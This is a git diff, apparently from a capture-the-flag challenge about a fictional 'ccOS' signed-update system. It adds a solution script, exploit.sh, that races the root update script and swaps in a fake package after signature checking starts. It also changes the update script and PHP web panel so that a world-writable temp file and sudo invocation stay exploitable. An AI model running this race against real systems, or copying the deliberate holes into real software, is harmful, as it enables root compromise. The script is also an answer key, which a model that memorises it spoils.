diff --git a/solution/exploit.sh b/solution/exploit.sh new file mode 100644 index 0000000..8db813c --- /dev/null +++ b/solution/exploit.sh @@ -0,0 +1,16 @@ +#!/bin/sh + +# The solution require the original update.tar.cc in /tmp named 'orig' +# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777 + +cd /tmp; +cp orig update.tar.cc; +chmod 777 update.tar.cc; +sudo -u upgrade /bin/sh /update.sh > log & +while true; do + if [[ "$(cat log | grep Checking)" ]]; then + sleep 0.01 + cp pwn update.tar.cc; + fi +done; + diff --git a/solution/update.tar.cc b/solution/update.tar.cc new file mode 100644 index 0000000..4909928 Binary files /dev/null and b/solution/update.tar.cc differ diff --git a/update/update.sh b/update/update.sh index 1e141bd..efdffc4 100755 --- a/update/update.sh +++ b/update/update.sh @@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then exit 1 fi - pubkey="/pub.pem" file="/tmp/update.tar.cc" -/bin/chmod 777 $file +sig="/tmp/sig" /bin/echo "### ccOS Update Script ###" /bin/echo "[+] Starting" -/bin/sleep 1 /bin/echo "[+] Extracting Signature" skip=$(expr $(stat -c '%s' $file) - 256) if [[ -L $file ]] then exit 0 fi -/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip +/bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip /usr/bin/truncate -s $skip $file -check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file` +/bin/echo "[+] Checking Signature" +check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file` if [ "$check" == "Verified OK" ] then /bin/echo "[+] Signature is valid!" /bin/echo "[+] Upgrading..." /bin/tar -xvf $file -C / - /bin/rm /tmp/sig + /bin/rm $sig /bin/echo "[+] Done" else /bin/echo "[-] Signature error, exiting..." - /bin/rm /tmp/sig + /bin/rm $sig fi diff --git a/webpanel/update.php b/webpanel/update.php index 95a0bdb..0f3bd43 100644 --- a/webpanel/update.php +++ b/webpanel/update.php @@ -5,8 +5,9 @@ require_once("includes/header.php"); require_once("includes/nav.php"); if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) { - move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc'); - exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result); + move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc'); + exec("/bin/chmod 777 /tmp/update.tar.cc"); + exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result); } ?> @@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['